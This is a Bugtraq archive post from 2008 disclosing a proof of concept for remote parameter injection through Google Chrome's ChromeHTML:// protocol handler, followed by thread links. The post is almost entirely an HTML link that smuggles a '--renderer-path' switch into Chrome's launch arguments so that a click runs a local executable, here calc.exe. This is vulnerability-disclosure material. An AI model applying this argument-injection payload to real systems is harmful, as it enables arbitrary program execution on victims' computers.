Bugtraq mailing list archives
Google Chrome Browser (ChromeHTML://) remote parameter injection POC
From: nospam () mail it
Date: Tue, 23 Dec 2008 12:54:29 -0700
<!-- Google Chrome Browser (ChromeHTML://) remote parameter injection POC by Nine:Situations:Group::bellick&strawdog Site: http://retrogod.altervista.org/ tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3 List of command line switches: http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc Original url: http://retrogod.altervista.org/9sg_chrome.html click the following link with IE while monitoring with procmon --> <a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>
Current thread:
- Google Chrome Browser (ChromeHTML://) remote parameter injection POC nospam (Dec 24)
- <Possible follow-ups>
- Re: Google Chrome Browser (ChromeHTML://) remote parameter injection POC Already-sended-information-to-security-focus (Dec 25)
- Re: Re: Google Chrome Browser (ChromeHTML://) remote parameter injection POC nospam (Dec 29)